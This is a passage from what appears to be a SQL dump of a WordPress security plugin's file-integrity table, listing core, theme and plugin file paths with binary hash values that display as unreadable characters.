','',0,'?'),('�7m�X,jԍ�����','wp-content/themes/regina-lite/layout/js/plugins/owl-carousel/owl-carousel.min.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�����l\\��*��','��4[tғ�q)�u+|[v�YBPtIႾ�','',0,'?'),('�P,�]1�P�zT60�','wp-content/themes/advance/inc/kirki/includes/class-kirki-sanitize-values.php',0,'i��Z_���D�\'�����','i��Z_���D�\'�����','R;+$����XNűm�X6ʒ�J�FYgOX1M��[','',0,'?'),('�T���!ة7�l��<','wp-includes/js/codemirror/htmlhint-kses.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('�_���jSX�2�QQ=','wp-includes/ms-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?'),('�`~|D%EH�wO����','wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�]-�@W�\\0��Wv','�c`�C(ߛ�V�S6ب�c�s�u8�6��l','',0,'?'),('�i�h:hE���ih]��','wp-content/themes/regina-lite/sections/section-home-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' \rY;v�c�\0Dx�','��_���� �>�H�˲�;�V\r�<��F�I\n','',0,'?'),('ÂuJ�M�/� w�y','wp-includes/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XP�sHG�/n�w','�-ܙ���_�P^�C����`ֵ�.���F�If','',0,'?'),('ä��]0�`���AS:D','wp-includes/js/dist/blob.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eLi���7�Mq\nk��','ZF�}��bgHCk��]��`�E|k�nW�','',0,'?'),('ý��P��7&ݣ`�)','wp-includes/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uw�h[e��z�x��','wp�B��3K�r3_�!�}��b����d�v\r��','',0,'?'),('��tnR�ؔ����%^�','wp-admin/images/align-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���Oe#�l@:P+\"v','�ɳ���C��?�=���&��UyZ�31��!<c','',0,'?'),('��<O�>��jW�֣�','wp-content/themes/regina-lite/layout/js/plugins/owl-carousel/owl-carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���~�TE�-γ','^S����B�ŅZ�C8�\\s�P��c7M��[\n','',0,'?'),('���5�V\"�$$�_��','wp-admin/includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=b��)�z��(��','��\\���.�[-�C��-�E>B᧶9�����','',0,'?'),('��4�l!�r�����','wp-includes/class-wp-block-type-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rR�M8��u<�V�l��','�\Z�7�Q\0����O�C�\r.�D�\0n*���','',0,'?'),('��e��fz���eox��','wp-content/themes/twentytwentyone/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\"qѹ��sԬ','�J��3��mZ��2:��d�\\�6_�Շ�c*4','',0,'?'),('��iY����\0\nR)��','wp-includes/post-thumbnail-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��V��cꘄ','G�%*�J ���$��o=�@��k����Jl�','',0,'?'),('��u�X�ݼ#�-���','wp-includes/class-wp-http-ixr-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����2���5K','�BVrAC\n�a�+���(�;%�FdC��TD�#��','',0,'?'),('�ň��/���tNҊb','wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����3,B�V���','��ڑ�t4U��\"�;�t�7�\Z�Jy�rb@','',0,'?'),('�&)����N~&����','wp-content/themes/twentytwentyone/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����ّ^R� ','\Z��u�@�\'\\��KL�82�B��r�\Z2HC�o','',0,'?'),('�U���D������?','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/classes/class-epsilon-repeater-templates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{���#��%�Q��7�','�#l�}�9D����Kٶ�}�o-��ό�','',0,'?'),('�`�,}��D��@','wp-includes/class-wp-recovery-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oxц��<N��','�4>���\r� j����s�dqm��H��l�7�~��','',0,'?'),('ă�rޫ_<�w��w','wp-content/themes/doctors/core/customizer/help/_social-icons-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�O>�q��\"���3�','0P#�F#���b�o��}+n0�[�v3)F��','',0,'?'),('Ĉ^A��+l���o�d��','wp-includes/js/tinymce/skins/wordpress/images/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('ĔԼ���pP�Z H��','wp-includes/images/smilies/icon_cry.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('Ħ��SNL��h`���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"mb�\'u�̩��D�','9Z�Jn�l+;�CG; �+�0s����f�8�','',0,'?'),('ijJ�\n`|�5,HT��','wp-admin/includes/admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��1T�(Nȩ\Z','�7��NZ|�0�N��HQ��r�\nR��o�C�f','',0,'?'),('Ķ�Ɩ�o���èf{U','wp-includes/js/jquery/ui/effect-highlight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('�Ѻɩ��uy����}','wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('���M\\��<(��s�','wp-content/themes/advance/inc/kirki/assets/js/l10n.js',0,'�8%�T���{ )eO\r>�','�8%�T���{ )eO\r>�','����3�R�{��s�w��\r+Y~\0e�Ó=թ$','',0,'?'),('��ʙ\0}��甠K��.�','wp-includes/js/jquery/jquery.color.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('��{A��mm��*�K','wp-includes/nav-menu-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JI1E%g䅝�?�&�','AS%�³�[�|ZJf�RH3#Bl�K��zH','',0,'?'),('�5�7{�-C�Zט;ׂ','wp-content/themes/advance/inc/kirki/assets/images/kirki-bottom.svg',0,'�&>\\�<��W��c��8�','�&>\\�<��W��c��8�','�%\Z�\"S��/k��������������Q�','',0,'?'),('�D���C����F}��','wp-includes/Requests/Exception/HTTP/418.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J!�����[��4��','4 �6鎬��M&�$!�2d<��\\ |\\�?g�\n','',0,'?'),('�V݀^�W�4��-zX','wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fq�ag�D���i\"','-u��|�5��CD`��磩QrG��)&�','',0,'?'),('�_�n�����p���aV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L�1�˵�\"k%F�+','Z��i�M�f�U�v�i-�})��f�\"��Mnd?X','',0,'?'),('�`#��G�b�C��֊�','wp-includes/js/swfupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��ڙK�~q ����c=','�T�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�g�t�\\���wg덼','wp-content/themes/doctors/core/vandors/mr-image-resize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b\'�{8`�$������','{t���M��X<GU1�i,�wр��Z�@��','',0,'?'),('�jy�vʷ���B�/�l�','wp-content/themes/doctors/core/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k��Gsvu}]��','��Y2�20�e&�+%�#���dh͊��4`z �N','',0,'?'),('łj�Dߋ�.�˖D��','wp-admin/css/forms.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3B2�&*)��^*��3','�ĤѮp\\��;x�\'���H�42�N��_�Ei','',0,'?'),('Ŋ��6���@�L(`��','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �W� r��>�Vݟ�','p�<L�>�������\r�~29~�^��ɋF�','',0,'?'),('ũ����\Z���� q�','wp-content/themes/healthcare/images/Comingsoon.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F;�(�p_','vo������qX���J{~B\rF��5QX��YR绀','',0,'?'),('że�����E@}-�','wp-content/plugins/wp-cerber/assets/flags/ss.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��-�p�lE���k�/�','wp-includes/js/jquery/jquery.hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9 +V�k�','',0,'?'),('�v�0�r�m����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�U�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e� �','',0,'?'),('��A#����Uu�O���','wp-content/plugins/wp-cerber/assets/flags/sk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�q!-�\"�jU]P','��!$�2�E@��e�K���z\\�x�<GF� ','',0,'?'),('�v�T!)��aH�','wp-content/plugins/wp-cerber/assets/flags/mq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zs�׳Wh���','����J���U2V\\��h�Ѧ�Z�t/���Q','',0,'?'),('�ZTD�\r�[��FcLL�','wp-includes/blocks/gallery/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������9��Qv��','��PgcZn1q��b�-���x�]ME��ܻ���','',0,'?'),('� ��#A�\n#b#��=','wp-includes/js/tinymce/themes/inlite/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('��p�1 �?��J@�','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǧn3Q�2�G�','�d��\"fݎ���6em�`�z����P<KO�','',0,'?'),('�+���g���q6�^\0�','wp-admin/images/wheel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0� q0m��\ZY%V�X�','(]�:=d�qۅ�O{9�Ԁ�v��Ș~����','',0,'?'),('�-\"s8�b� ���h','wp-content/themes/healing-touch/images/slides/slider2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܭ?�X��_Y�Sɶ��','�3��W�m](|LV�3K�U�+{�P�X±����','',0,'?'),('�/tNiJ�Ǔ�6ZO��','wp-content/themes/healthcare/bootstrap/css/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>SƄ:�.0}�}','z��ܓ=�gRȯu�*2�����oO:i`\n�̀X','',0,'?'),('�@��:<�o|J-e�','wp-content/plugins/wordfence/images/wf-error-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EQt��s �Mz�y���','��殙F��`�a�݀�k���mE�Q��+~��','',0,'?'),('ƅ����|_�i/y�� ','wp-includes/js/tinymce/plugins/media/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('Ƭ+\Z���I�d^i <\0','wp-includes/js/jquery/suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('Ƭ��SX���Z���3�','wp-includes/js/dist/plugins.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OBb�?�Ɖ�х��','�[��ɉ��NN�^p��D_S��r�pI~8,�v','',0,'?'),('�Ցf�)cW)֗�Og�','wp-content/themes/twentytwentyone/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��5�%�$���','}�C!�Mk;\'�?]�]��VW��A�e�Bߊ�','',0,'?'),('���yw�-p��`�)','wp-content/plugins/wp-cerber/assets/flags/cd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��E�\0{+k�`֚o','bf&<�9�\nTĔ��n��\Z~�\Z,����!��','',0,'?'),('�몳@� �=��y`','wp-content/plugins/wordfence/views/options/options-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�0�\"����#�','��֩y\n� ��ij����X�H�-<f ��c�','',0,'?'),('�A�2�fn��9�V��','wp-content/themes/vision-lite/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�)��k5��n}�4�','\Zr�nR�;��E�[��)�J�p�U-�q���\0?q','',0,'?'),('�͌%+�e�@uQ(�','wp-includes/js/dist/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ũ8��6uj(X4ѨÎ�','������U:W�{\n�b)SN��.=}c�A','',0,'?'),('�k8Q?<��y�p�','wp-content/plugins/akismet/views/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�CN3|)-�2Na���','���t�Cz� ����n�`j\r�M��N\"Ag���','',0,'?'),('�)�o�\nl�>��6�','wp-content/themes/healthcare/images/Healthcare-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�{��_zL؝��`\"','~Ef1��>p�XZ��b*8_\'��0��+-�!�','',0,'?'),('�=�m����^D6W�','wp-content/themes/twentynineteen/sass/modules/_clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vY��P\\;���4�','�s���3s=���#q���˞< �I\'r&�','',0,'?'),('�FU�G��Хd�c��NC','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Al͟��\ZԀ�c��','�x�����(��Sn��\n;�y{%�_�j���/','',0,'?'),('�~�\ZF �\r[H�M���','wp-content/themes/healthcare/admin/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|<�D\Z�R;�t��','�cw!�ʼn�OSQ�]��r��N����(��;��\'','',0,'?'),('ǁ����F�b@�d��','wp-content/themes/skt-toothy/images/mobile_nav_right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I����Y#��&٩O','/E��tX`6�G�>�EPx>�k�[�E���','',0,'?'),('ǂ-i)�.�\\���z�^a','wp-includes/Text/Diff/Engine/shell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('Dž�9��9:���\Z�','wp-includes/cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��V��O��yDv� !','{�d���<>wb�S�q����B������','',0,'?'),('dž_5�2�߱�c�ƫ','wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�vm_��I��\\����','\r��鋕��1(���p�KH�KBY����eB','',0,'?'),('ǝ�^�x�JB\Z�3-�6','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��5]{\"���V�','�C�Jr~W�OY�*[�:[j)���G�Є�e�','',0,'?'),('Ǥ>z�Ԅ��!J]>','wp-includes/css/wp-auth-check-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�P��KN��zj��K','V<e�b��(�k��I��2�\ZÜu�/#4Ɇmz','',0,'?'),('ǩ�XdrY[�w�ĺ�','wp-content/themes/advance/inc/kirki/includes/dynamic-css.php',0,'p ���v+���Fx�','p ���v+���Fx�','ǣ�����b �n/�C�X���<�lF�S�','',0,'?'),('ǫ�=��m�/���^','wp-admin/includes/schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���PI ��k����� ','&�v��x¡�gu�SV���ҏ����r�','',0,'?'),('ǭj�߃�;4��*','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-debug-logger.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�`�p.�Zb �x3I','#O)r�a�%�����r�2tK�P��1��kw��','',0,'?'),('dz\\��_L-Y�Ō%$','wp-includes/ID3/module.audio.dts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�llA�2���̋�','\Z�aH���r���%A���6$`Hu�T�6y�4�','',0,'?'),('Ǻ�\r2f��OW�q�','wp-content/themes/doctors/core/contents/part_footerWidgets/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�i�VFg�\Z�4�','����H7�d�Ʋ/��J���J�::S��M','',0,'?'),('Ǽ=���/%�@6�Dn','wp-content/themes/twentynineteen/sass/modules/_alignments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3��\\�sӳR��]iO','̰簃b���p4�i��шB6����A���','',0,'?'),('��w��y�*�X�O\nG��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�Vl~�m[%Wt','P�q\0������V{|�0m\0;���2�f@U�','',0,'?'),('��}�C�wX�TC��','wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('��w.�(S�*I�e','wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nB���j����',')���i�o�[G\ZC�)E�ϳl�\r�h�d�!','',0,'?'),('�\Z{g�?�3gڢ\Z�','wp-admin/images/icons32-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�*�����g����','�#!$��@�0g�.�;i3%!�cHP���=','',0,'?'),('��fp��\0!�tDK','wp-admin/js/code-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�\'߽ �%���','��-�Bd/�`��\\V�x6Y*��-$����W','',0,'?'),('�\"u@��T��S��5�','wp-includes/images/smilies/icon_idea.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<]�W3tށ�','�{�2^4S����Tl���I�J�Q��\"','',0,'?'),('�7�\0��tt��.','wp-content/plugins/wordfence/views/dashboard/status-renewing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','an�$�6�����\"','�tɢ�����C-?�\'(�uꢦA�T-1ba��:','',0,'?'),('�8����R�6>G\"���','wp-includes/js/dist/element.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pO�E����6�wR%v','�h�4[��0��7-��\\{�e��$.(.���o�','',0,'?'),('�;����N�Q>���','wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��vwX\n_Yg!��','r;�\Z� G�����[i$�)���v�]j7�im#','',0,'?'),('�Y$\'����o���','wp-includes/css/wp-auth-check-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���jv�sZ��ܻ&h�','F�V=&G\"�r��\rF�p��\nJ�ݣ�=՟3�','',0,'?'),('�oU�҇�R�c�����','wp-content/themes/regina-lite/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`j�Ǯ������','�n:�-m�CGX�9^<a�c1z���뽯��X0','',0,'?'),('�u��C~7\n���W�e�','wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�we�J�����@�?��','�W�ľ�6���7#`_�g�;���,9�.��=','',0,'?'),('ȁ��#/�\0��6','wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4��ӹu�;P�','�aD�,�ǭ��+v�Fe\"+���!���1t','',0,'?'),('ȋ�uN��1�c�7','wp-content/plugins/redirection/api/api-plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�J����{�A�$&',']�*�d� ��#OXh�@\ZO�V�ƴ','',0,'?'),('ȍP�� �3����\n��','wp-includes/class-wp-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(���H�g1k!~','Գh(��m7B��.�oǏu��ʼ%a��1ʾ�','',0,'?'),('ȣ�gӰ�DZCs��','wp-content/plugins/wp-cerber/assets/flags/cs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qȥ�`�����','���3�#�xUN�^�[ ^�1�a��GX9PP','',0,'?'),('ȶ{8�k0��-�P)$h','wp-content/themes/wp-barrister/library/js/jquery.cycle2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c<r���d#�ON�{','m\n�X\"�n=��Ne�;SD{(�ƨi�����','',0,'?'),('ȿ�-��`�u���o��','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�m;S��V#��m�I','�R9F��������47i}�ʧ��C^�%','',0,'?'),('���ܻ���\r4�K�{J','wp-content/themes/advance/inc/kirki/includes/class-kirki-toolkit.php',0,'z=+T\Z�5ecؐH��','z=+T\Z�5ecؐH��','�Oo�P6�:|5/M�_�6#.y�Ύ�y(���','',0,'?'),('�����~\r\ZK4(#��','wp-admin/user/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(팋�#��A���;�','�u�A���+I/�㊓\0�n�N�1G8�\ZD-�','',0,'?'),('�!�`�L�i\0Ը�u','wp-content/plugins/wp-cerber/assets/flags/mf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('�5�iD�hI�6�;','wp-includes/SimplePie/Cache/Memcached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('�7ŭ����OE6','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-filesystem-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6�tg��q�O1�0�','�Džg�L���)�Q�r���ty�jX��O�\n�& �','',0,'?'),('�A7�\'�C#�w�S�s�','wp-admin/css/about.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x ��\0�\Z�*m7v%',']jH��#���?�����j6MI�aҰ�(e��','',0,'?'),('�lX�w��B�*X�W�','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ��*�X���9e','�v�\Z�|5.YX ������Z�鹁Ź','',0,'?'),('Ɇ8���pŻѵV�','wp-content/plugins/wordfence/lib/wfActivityReport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pnӑ,vP*�`4i','��)ed}&�C�\"_ڸ�l<z�U�,?b:��@u','',0,'?'),('Ɉ1�Cp� 72J\'�','wp-content/themes/doctors/core/contents/part_footer/skin2/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܽH$8�I�\"���','�|\'vCR��ؐ6�l+�����7����5?5m','',0,'?'),('ɕng-���Zc\rQ�iJ/','wp-content/themes/regina-lite/layout/images/bx_loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�~K�����',',���E�a�H�RK_�ꨡָ)�Zi�^ ���h�','',0,'?'),('ɡʧ~����.)k','wp-admin/includes/class-custom-background.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_%��5�ߔrg[\Z�','��3�4�n�8�@�}���!��pc�8�\0�̴','',0,'?'),('���l���Q�[��1','wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�����y���\"�Ys','3�2�/ι��Dp�nXe\0uQ\nO#��G','',0,'?'),('�����2D�i�e�','wp-admin/css/l10n.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ĸ�P)�|��q�r���','wppS���\"�D�.��o�MO�m�O�\'b�aNj0','',0,'?'),('�ͤ� �T���-�','wp-content/plugins/wp-cerber/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��=v����]���V','k�����~ ��UH\Z��x�P��Ā��<��;X�','',0,'?'),('�(�q�4P�}�5Oz�k','wp-admin/js/inline-edit-tax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ƶ���s�[��\"�','�]:\r+�����ʩ\'X�bҸX�����LU�','',0,'?'),('�R���ш��0','wp-admin/css/themes.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L\0���M���\"�\\\\�','9\\�P�;P�;p�%/���?����]z]C�ǐ��','',0,'?'),('�d���EDB��Z��#','wp-content/themes/regina-lite/inc/customizer/assets/images/boxed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%S*U������e','��et�=/�M9>/�7\'�֓�\"�M��zN�L','',0,'?'),('�hFM<@`%q-��','wp-admin/includes/class-wp-filesystem-direct.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�,k�=G�c�x�','C������ �9�1�@���*C���Z','',0,'?'),('�n��X�ObW7M��&S','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/wp-customize-extenders/controls/color-schemes.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����??#���MSpt','Yw}��mth���<?�,�c��t�?�*-��','',0,'?'),('�r��{�\Zk��\"��k','wp-admin/css/site-health-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�9��yu�S�,�,�k','� �m���������BFX&I�[s��','',0,'?'),('�t*4bo����e0-x','wp-content/themes/weblog/acmethemes/core/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��w�9�ͻ;�','h�e�� .7��V[�æ�?�,_RyS����N','',0,'?'),('�xjP����!c�x','wp-admin/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�*���#��_��ҳZ�','�����f��uG#����\'��_ً�:�F�A','',0,'?'),('ʂ[ &�?p�bD','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��MA�@����|�','u��\Z�Ӛ1!�b�� \"�0SBȓ>�rEk�','',0,'?'),('ʵs�� ����R>��?','wp-content/themes/twentytwentyone/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G:��Ll�}\0!��%','mDTZ��\r�τ(c�zG�ܟKl�@����Kv','',0,'?'),('���W�>�ҟ����[','wp-includes/Requests/Exception/HTTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���Rlr��','o�E²tQQbo\n����r�Qq��\"�/����','',0,'?'),('��&�����~sXm','wp-content/themes/twentytwenty/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Kp@/ya3ˡ�ZіO','��1�*C�4é�GNÈOA�p1v7.�wV%��2F','',0,'?'),('�܆R(�\'2Whp���G','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@ҏH��C�5̨[\0��','�X��f:�M�t�˃#��sD�4(�NG�F�','',0,'?'),('�� b���8�[����y','wp-includes/js/wp-emoji-release.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d͢7@$��g�;','F\r�R7��s\"YX^�ȹ�$�y�ss[','',0,'?'),('�㱛��� 